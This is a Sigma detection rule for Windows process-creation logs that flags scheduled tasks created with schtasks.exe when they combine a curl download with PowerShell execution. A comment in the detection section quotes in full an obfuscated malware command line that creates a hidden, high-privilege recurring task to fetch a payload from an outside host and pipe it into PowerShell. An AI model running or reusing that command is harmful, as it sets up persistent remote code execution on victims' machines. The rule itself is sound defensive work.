Scheduled Task Creation with Curl and PowerShell Execution Combo

 1title: Scheduled Task Creation with Curl and PowerShell Execution Combo
 2id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
 3status: experimental
 4description: |
 5    Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
 6    This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.    
 7references:
 8    - https://tria.ge/241015-l98snsyeje/behavioral2
 9author: Swachchhanda Shrawan Poudel (Nextron Systems)
10date: 2025-02-05
11tags:
12    - attack.persistence
13    - attack.t1053.005
14    - attack.defense-evasion
15    - attack.t1218
16    - attack.command-and-control
17    - attack.t1105
18logsource:
19    category: process_creation
20    product: windows
21detection:
22    # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
23    selection_img:
24        Image|endswith: '\schtasks.exe'
25        CommandLine|contains|windash: ' /create '
26    selection_curl:
27        CommandLine|contains|all:
28            - 'curl '
29            - 'http'
30            - '-o'
31    selection_powershell:
32        CommandLine|contains: 'powershell'
33    condition: all of selection_*
34falsepositives:
35    - Legitimate use of schtasks for administrative purposes.
36    - Automation scripts combining curl and PowerShell in controlled environments.
37level: medium